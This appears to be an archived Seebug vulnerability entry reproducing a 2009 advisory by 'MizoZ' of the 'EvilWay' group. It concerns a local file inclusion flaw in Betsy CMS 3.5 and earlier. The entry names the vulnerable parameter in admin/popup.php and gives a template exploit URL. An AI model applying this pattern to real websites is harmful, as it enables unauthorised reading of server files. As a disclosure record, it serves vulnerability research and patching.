Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability

2009-11-21T00:00:00
ID SSV:18302
Type seebug
Reporter Root
Modified 2009-11-21T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /*

Author          : MizoZ [from MA]
Group           : EvilWay
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka !!

Good luck DZ :)

*/

The vulnerability is in the file admin/popup.php on the get $_GET['popup']

Exploit :

[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]